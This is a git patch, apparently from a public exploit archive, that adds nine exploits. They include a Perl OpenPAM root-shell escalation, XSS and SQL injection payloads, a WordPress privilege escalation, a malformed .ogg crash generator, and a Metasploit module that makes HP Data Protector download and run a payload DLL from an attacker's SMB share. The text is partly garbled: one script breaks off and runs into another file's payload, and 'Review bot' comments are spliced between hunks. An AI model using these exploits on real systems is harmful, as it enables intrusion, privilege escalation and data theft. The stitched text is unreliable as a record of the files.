From 65bae5bbd05c1c41f02ade54c4fffa22ff0b6e6f Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sun, 8 Mar 2015 08:37:21 +0000
Subject: [PATCH] Update: 2015-03-08 9 new exploits
---
files.csv | 9 ++
platforms/bsd/local/36296.pl | 52 ++++++++++
platforms/java/webapps/36299.txt | 17 ++++
platforms/php/webapps/36297.txt | 27 ++++++
platforms/php/webapps/36298.txt | 9 ++
platforms/php/webapps/36301.txt | 47 ++++++++++
platforms/php/webapps/36302.txt | 7 ++
platforms/php/webapps/36303.txt | 90 ++++++++++++++++++
platforms/windows/dos/36300.py | 48 ++++++++++
platforms/windows/remote/36304.rb | 151 ++++++++++++++++++++++++++++++
10 files changed, 457 insertions(+)
create mode 100755 platforms/bsd/local/36296.pl
create mode 100755 platforms/java/webapps/36299.txt
create mode 100755 platforms/php/webapps/36297.txt
create mode 100755 platforms/php/webapps/36298.txt
create mode 100755 platforms/php/webapps/36301.txt
create mode 100755 platforms/php/webapps/36302.txt
create mode 100755 platforms/php/webapps/36303.txt
create mode 100755 platforms/windows/dos/36300.py
create mode 100755 platforms/windows/remote/36304.rb
diff --git a/files.csv b/files.csv
index 35c9b2302..70c9b903a 100755
--- a/files.csv
+++ b/files.csv
@@ -32715,3 +32715,12 @@ id,file,description,date,author,platform,type,port
 36293,platforms/php/webapps/36293.txt,"Centreon 2.3.1 'command_name' Parameter Remote Command Execution Vulnerability",2011-11-04,"Christophe de la Fuente",php,webapps,0
 36294,platforms/linux/local/36294.c,"Linux Kernel <= 3.0.4 '/proc/interrupts' Password Length Local Information Disclosure Weakness",2011-11-07,"Vasiliy Kulikov",linux,local,0
 36295,platforms/php/webapps/36295.txt,"PBCS Technology 'articlenav.php' SQL Injection Vulnerability",2011-11-08,Kalashinkov3,php,webapps,0
+36296,platforms/bsd/local/36296.pl,"OpenPAM 'pam_start()' Local Privilege Escalation Vulnerability",2011-11-09,IKCE,bsd,local,0
+36297,platforms/php/webapps/36297.txt,"AShop Open-Redirection and Cross Site Scripting Vulnerabilities",2011-11-09,"Infoserve Security Team",php,webapps,0
+36298,platforms/php/webapps/36298.txt,"Joomla! 1.9.3 'com_alfcontact' Extension Multiple Cross Site Scripting Vulnerabilities",2011-11-10,"Jose Carlos de Arriba",php,webapps,0
+36299,platforms/java/webapps/36299.txt,"Infoblox NetMRI <= 6.2.1 Admin Login Page Multiple Cross Site Scripting Vulnerabilities",2011-11-11,"Jose Carlos de Arriba",java,webapps,0
+36300,platforms/windows/dos/36300.py,"Kool Media Converter 2.6.0 '.ogg' File Buffer Overflow Vulnerability",2011-11-11,swami,windows,dos,0
+36301,platforms/php/webapps/36301.txt,"WordPress Download Manager 2.7.2 - Privilege Escalation",2014-11-24,"Kacper Szurek",php,webapps,0
+36302,platforms/php/webapps/36302.txt,"Joomla Content Component 'year' Parameter SQL Injection Vulnerability",2011-11-14,E.Shahmohamadi,php,webapps,0
+36303,platforms/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection Vulnerability",2015-03-06,"ITAS Team",php,webapps,80
+36304,platforms/windows/remote/36304.rb,"HP Data Protector 8.10 Remote Command Execution",2015-03-06,metasploit,windows,remote,5555
diff --git a/platforms/bsd/local/36296.pl b/platforms/bsd/local/36296.pl new file mode 100755 index 000000000..06b19cb5f --- /dev/null +++ b/platforms/bsd/local/36296.pl @@ -0,0 +1,52 @@ +source: http://www.securityfocus.com/bid/50607/info + +OpenPAM is prone to a local privilege-escalation vulnerability. + +Local attackers may exploit this issue to execute arbitrary code with superuser privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. + +#!/usr/bin/perl + +# kcheckpass invoking pam_start() with user provided +# service argument, what a bad idea. OpenPAM accepts that. +# Maybe this pam_start() vulnerability is exploitable via +# other vectors as well. +# Vuln tested on a FreeBSD 8.1. It does not affect +# Linux PAM, as it is checking for / character + +# (C) 2011 by some dude, meant as a PoC! Only use on your own +# machine and on your own risk!!! +# +# This commit is likely to fix the bug: +# http://trac.des.no/openpam/changeset/478/trunk/lib/openpam_configure.c +# + +my $kcheckpass = "/usr/local/kde4/lib/kde4/libexec/kcheckpass"; + +# build suid shell +open(O,">/tmp/slam.c") or die $!; +print O< +#include + +void __attribute__((constructor)) init() +{ + char *a[] = {"/bin/sh", NULL}; + setuid(0); + execve(*a, a, NULL); +} +EOC +close(O); + +# build fake pam module +system("gcc -fPIC -Wall -c /tmp/slam.c -o /tmp/slam.o;gcc -shared -o /tmp/slam.so /tmp/slam.o"); + +# build fake PAM service file +open(O,">/tmp/pamslam") or die $!; +print O<alert(document.cookie)&mode=&skipjackPassword=ForegroundSecurity&skipjackUsername=ForegroundSecurity&weakPassword=false \ No newline at end of file diff --git a/platforms/php/webapps/36297.txt b/platforms/php/webapps/36297.txt new file mode 100755 index 000000000..f976b96b4 --- /dev/null +++ b/platforms/php/webapps/36297.txt 
@@ -0,0 +1,27 @@
+source: http://www.securityfocus.com/bid/50616/info
+
+AShop is prone to multiple open-redirection issues and multiple cross-site scripting issues because it fails to sufficiently sanitize user-supplied input.
+
+Attackers can exploit these issues to execute arbitrary script or HTML code, steal cookie-based authentication credentials, and conduct phishing attacks. Other attacks may also be possible.
+
+Versions prior to AShop 5.1.4 are vulnerable.
+
+IE8
+
+http://www.example.com/ashop/?'"
+http://www.example.com/ashop/index.php?'"
+http://www.example.com/ashop/picture.php?picture=" stYle=x:expre/**/ssion(alert(document.cookie)) ns="
+http://www.example.com/ashop/index.php?language='"
+
+FF 7.1
+
+http://www.example.com/ashop/index.php?searchstring=1&showresult=true&exp='"&resultpage=&categories=off&msg=&search=index.php&shop=1
+http://www.example.com/ashop/catalogue.php?cat=3&exp=3&shop=3&resultpage='"&msg=
+http://www.example.com/ashop/catalogue.php?cat=3&exp=3&shop=3&resultpage=1&msg='"
+http://www.example.com/ashop/basket.php?cat=0&sid='"&shop=1&payoption=3
+
+Open Redirection
+
+http://www.example.com/ashop/language.php?language=sv&redirect=http://www.google.com
+http://www.example.com/ashop/currency.php?currency=aud&redirect=http://www.google.com
+http://www.example.com/ashop/currency.php?redirect=http://www.google.com
diff --git a/platforms/php/webapps/36298.txt b/platforms/php/webapps/36298.txt
new file mode 100755
index 000000000..4e93af430
--- /dev/null
+++ b/platforms/php/webapps/36298.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/50637/info
+
+Joomla! 'com_alfcontact' extension is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker could leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Joomla! 'com_alfcontact' extension 1.9.3 is vulnerable; prior versions may also be affected.
+
+&email=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&emailid=5%2c%2cCareers%20at%20Foreground%20Security&emailto_id=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&extravalue=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&message=20&name=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&option=com_alfcontact&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge&subject=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&task=sendemail
\ No newline at end of file
diff --git a/platforms/php/webapps/36301.txt b/platforms/php/webapps/36301.txt
new file mode 100755
index 000000000..de18f8cff
--- /dev/null
+++ b/platforms/php/webapps/36301.txt
@@ -0,0 +1,47 @@ +# Exploit Title: WordPress Download Manager 2.7.2 Privilege Escalation +# Date: 24-11-2014 +# Software Link: https://wordpress.org/plugins/download-manager/ +# Exploit Author: Kacper Szurek +# Contact: http://twitter.com/KacperSzurek +# Website: http://security.szurek.pl/ +# Category: webapps +# CVE: CVE-2014-9260 + +1. Description + +Every registered user can update every WordPress options using basic_settings() function. + +function basic_settings() +{ + if (isset($_POST['task']) && $_POST['task'] == 'wdm_save_settings') { + + foreach ($_POST as $optn => $optv) { + update_option($optn, $optv); + } + if (!isset($_POST['__wpdm_login_form'])) delete_option('__wpdm_login_form'); + + + + die('Settings Saved Successfully'); + } + include('settings/basic.php'); +} + +http://security.szurek.pl/wordpress-download-manager-272-privilege-escalation.html + +2. Proof of Concept + +Login as standard user (created using wp-login.php?action=register) then: + +
+ + + + +
+
+After that create new user using wp-login.php?action=register. Newly created user will have admin privileges.
+
+3. Solution:
+
+Update to version 2.7.3
\ No newline at end of file
diff --git a/platforms/php/webapps/36302.txt b/platforms/php/webapps/36302.txt
new file mode 100755
index 000000000..ff662e412
--- /dev/null
+++ b/platforms/php/webapps/36302.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/50656/info
+
+Content component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/joomla/index.php?option=com_content&view=archive&year=1 [BSQLI]
\ No newline at end of file
diff --git a/platforms/php/webapps/36303.txt b/platforms/php/webapps/36303.txt
new file mode 100755
index 000000000..c4e99f254
--- /dev/null
+++ b/platforms/php/webapps/36303.txt
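Review bot: The `basic_settings()` excerpt under '1. Description' shows the loop `foreach ($_POST as $optn => $optv) { update_option($optn, $optv); }` but the write-up never names the controls that are missing, which is exactly what a reader patching a fork needs. The loop runs with no capability check such as `current_user_can('manage_options')`, no nonce verification and no allow-list of the plugin's own option names, so every option is writable by any account that reaches the handler. A one-line `Fix:` entry before '3. Solution' stating those three controls would make the advisory self-contained instead of pointing only at the 2.7.3 upgrade. The proof-of-concept form between '2. Proof of Concept' and 'After that' appears to have been stripped from this hunk, so that part cannot be reviewed here.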
@@ -0,0 +1,90 @@
+#Vulnerability title: ProjectSend r561 - SQL injection vulnerability
+#Product: ProjectSend r561
+#Vendor: http://www.projectsend.org/
+#Affected version: ProjectSend r561
+#Download link: http://www.projectsend.org/download/67/
+#Fixed version: N/A
+#Author: Le Ngoc Phi (phi.n.le@itas.vn) & ITAS Team (www.itas.vn)
+
+
+::PROOF OF CONCEPT::
+
++ REQUEST:
+GET /projectsend/users-edit.php?id= HTTP/1.1
+Host: target.org
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101
+Firefox/35.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: 54f8105d859e0_SESSION=q6tjpjjbt53nk1o5tnbv2123456;
+PHPSESSID=jec50hu4plibu5p2p6hnvpcut6
+Connection: keep-alive
+
+
+- Vulnerable file: client-edit.php
+- Vulnerable parameter: id
+- Vulnerable code:
+if (isset($_GET['id'])) {
+ $client_id = mysql_real_escape_string($_GET['id']);
+ /**
+ * Check if the id corresponds to a real client.
+ * Return 1 if true, 2 if false.
+ **/
+ $page_status = (client_exists_id($client_id)) ? 1 : 2;
+}
+else {
+ /**
+ * Return 0 if the id is not set.
+ */
+ $page_status = 0;
+}
+
+/**
+ * Get the clients information from the database to use on the form.
+ */
+if ($page_status === 1) {
+ $editing = $database->query("SELECT * FROM tbl_users WHERE
+id=$client_id");
+ while($data = mysql_fetch_array($editing)) {
+ $add_client_data_name = $data['name'];
+ $add_client_data_user = $data['user'];
+ $add_client_data_email = $data['email'];
+ $add_client_data_addr = $data['address'];
+ $add_client_data_phone = $data['phone'];
+ $add_client_data_intcont = $data['contact'];
+ if ($data['notify'] == 1) { $add_client_data_notity = 1; }
+else { $add_client_data_notity = 0; }
+ if ($data['active'] == 1) { $add_client_data_active = 1; }
+else { $add_client_data_active = 0; }
+ }
+}
+
+
+
+::DISCLOSURE::
++ 01/06/2015: Detect vulnerability
++ 01/07/2015: Contact to vendor
++ 01/08/2015: Send the detail vulnerability to vendor - vendor did not reply
++ 03/05/2015: Public information
+
+::REFERENCE::
+-
+http://www.itas.vn/news/itas-team-found-out-a-SQL-Injection-vulnerability-in
+-projectsend-r561-76.html
+
+
+::DISCLAIMER::
+THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF
+ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY
+IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE
+OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS
+A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION
+OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS,
+AND AT THE USER'S OWN RISK.
+
+
+
+Best Regards,
+---------------------------------------------------------------------
+ITAS Team (www.itas.vn)
diff --git a/platforms/windows/dos/36300.py b/platforms/windows/dos/36300.py
new file mode 100755
index 000000000..ce3d1bc0c
--- /dev/null
+++ b/platforms/windows/dos/36300.py
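Review bot: The advisory names `client-edit.php` on the `- Vulnerable file:` line while the request in the proof of concept targets `users-edit.php`; one of the two is wrong and should be corrected so the finding can be reproduced and patched against the right file. The quoted code also shows why `mysql_real_escape_string` does not help here: `$client_id` is interpolated unquoted into `SELECT * FROM tbl_users WHERE id=$client_id`, so escaping quote characters leaves the numeric context open. Since the header says `#Fixed version: N/A`, a `Fix:` line stating the defensive change would be useful, e.g. cast the parameter with `$client_id = (int) $_GET['id'];` or bind it through a prepared statement. The `id=` value in the GET line appears to have been stripped from this hunk, so the exact request cannot be checked here.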
@@ -0,0 +1,48 @@
+source: http://www.securityfocus.com/bid/50651/info
+
+Kool Media Converter is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
+
+Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
+
+Kool Media Converter 2.6.0 is vulnerable; other versions may also be affected.
+
+#!/usr/bin/env python
+#
+#
+# Exploit Title: Kool Media Converter v2.6.0 DOS
+# Date: 10/10/2011
+# Author: swami
+# E-Mail: flavio[dot]baldassi[at]gmail[dot]com
+# Software Link: http://www.bestwebsharing.com/downloads/kool-media-converter-setup.exe
+# Version: 2.6.0
+# Tested on: Windows XP SP3 ENG
+#
+#--- From Vendor Website
+# Kool Media Converter is a sound tool addressed to casual listeners and fervent
+# audiophiles likewise. It deals with compatibility problems between your audio files
+# and the media player you are using to help you enjoy all the songs you love anyway you like.
+#
+#--- Description
+# Kool Media Converter fails to handle a malformed .ogg file
+
+ogg = b'\x4F\x67\x67\x53' # Capture Pattern OggS in ascii
+ogg += b'\x00' # Version currently 0
+ogg += b'\x02' # Header Type of page that follows
+ogg += b'\x00' * 8 # Granule Position
+ogg += b'\xCE\xc6\x41\x49' # Bitstream Serial Number
+ogg += b'\x00' * 4 # Page Sequence Number
+ogg += b'\x70\x79\xf3\x3d' # Checksum
+ogg += b'\x01' # Page Segment max 255
+ogg += b'\x1e\x01\x76\x6f' # Segment Table
+
+ogg += b'\x41' * 1000
+
+try:
+ f = open('koolPoC.ogg','wb')
+ f.write(ogg)
+ f.close()
+except:
+ print('\nError while creating ogg file\n')
+
+
+
diff --git a/platforms/windows/remote/36304.rb b/platforms/windows/remote/36304.rb
new file mode 100755
index 000000000..6fce77369
--- /dev/null
+++ b/platforms/windows/remote/36304.rb
@@ -0,0 +1,151 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::SMB::Server::Share
+ include Msf::Exploit::EXE
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'HP Data Protector 8.10 Remote Command Execution',
+ 'Description' => %q{
+ This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary
+ commands can be execute by sending crafted requests with opcode 28 to the OmniInet
+ service listening on the TCP/5555 port. Since there is an strict length limitation on
+ the command, rundll32.exe is executed, and the payload is provided through a DLL by a
+ fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on
+ Windows 7 SP1.
+ },
+ 'Author' => [
+ 'Christian Ramirez', # POC
+ 'Henoch Barrera', # POC
+ 'Matthew Hall ' # Metasploit Module
+ ],
+ 'References' =>
+ [
+ ['CVE', '2014-2623'],
+ ['OSVDB', '109069'],
+ ['EDB', '34066'],
+ ['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818']
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'thread',
+ },
+ 'Payload' =>
+ {
+ 'Space' => 2048,
+ 'DisableNops' => true
+ },
+ 'Privileged' => true,
+ 'Platform' => 'win',
+ 'Stance' => Msf::Exploit::Stance::Aggressive,
+ 'Targets' =>
+ [
+ [ 'HP Data Protector 8.10 / Windows', { } ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Nov 02 2014'))
+
+ register_options(
+ [
+ Opt::RPORT(5555),
+ OptString.new('FILE_NAME', [ false, 'DLL File name to share']),
+ OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
+ ], self.class)
+
+ deregister_options('FOLDER_NAME')
+ deregister_options('FILE_CONTENTS')
+ end
+
+ def check
+ fingerprint = get_fingerprint
+
+ if fingerprint.nil?
+ return Exploit::CheckCode::Unknown
+ end
+
+ print_status("#{peer} - HP Data Protector version #{fingerprint}")
+
+ if fingerprint =~ /HP Data Protector A\.08\.(\d+)/
+ minor = $1.to_i
+ else
+ return Exploit::CheckCode::Safe
+ end
+
+ if minor < 11
+ return Exploit::CheckCode::Appears
+ end
+
+ Exploit::CheckCode::Detected
+ end
+
+ def peer
+ "#{rhost}:#{rport}"
+ end
+
+ def get_fingerprint
+ ommni = connect
+ ommni.put(rand_text_alpha_upper(64))
+ resp = ommni.get_once(-1)
+ disconnect
+
+ if resp.nil?
+ return nil
+ end
+
+ Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null
+ end
+
+ def send_pkt(cmd)
+ cmd.gsub!("\\", "\\\\\\\\")
+
+ pkt = "2\x00"
+ pkt << "\x01\x01\x01\x01\x01\x01\x00"
+ pkt << "\x01\x00"
+ pkt << "\x01\x00"
+ pkt << "\x01\x00"
+ pkt << "\x01\x01\x00 "
+ pkt << "28\x00"
+ pkt << "\\perl.exe\x00 "
+ pkt << "-esystem('#{cmd}')\x00"
+
+ connect
+ sock.put([pkt.length].pack('N') + pkt)
+ disconnect
+ end
+
+ def primer
+ self.file_contents = generate_payload_dll
+ print_status("File available on #{unc}...")
+
+ print_status("#{peer} - Trying to execute remote DLL...")
+ sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}"
+ send_pkt(sploit)
+ end
+
+ def setup
+ super
+
+ self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"
+
+ unless file_name =~ /\.dll$/
+ fail_with(Failure::BadConfig, "FILE_NAME must end with .dll")
+ end
+ end
+
+ def exploit
+ begin
+ Timeout.timeout(datastore['SMB_DELAY']) {super}
+ rescue Timeout::Error
+ # do nothing... just finish exploit and stop smb server...
+ end
+ end
+end
\ No newline at end of file
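Review bot: `check` returns `Exploit::CheckCode::Appears` for any fingerprint matching `A.08.<minor>` with `minor < 11`, but nothing in the module records why 11 is the cut-off; the description and the single target only mention 8.10, so a maintainer cannot tell whether 8.11 is the fixed build or just untested. A comment above the comparison would preserve that reasoning, e.g. `# A.08.10 and earlier 8.x builds are treated as unpatched; presumably fixed from A.08.11 per the vendor advisory in References - confirm`. Separately, `send_pkt` rewrites its argument in place with `cmd.gsub!`, so the caller's `sploit` string is silently changed after the call; `cmd = cmd.gsub("\\", "\\\\\\\\")` builds the same packet without the side effect. The `exploit` override discards `Timeout::Error` with only a comment, which is deliberate but undocumented at the option level; the `SMB_DELAY` description could say that expiry is treated as normal completion.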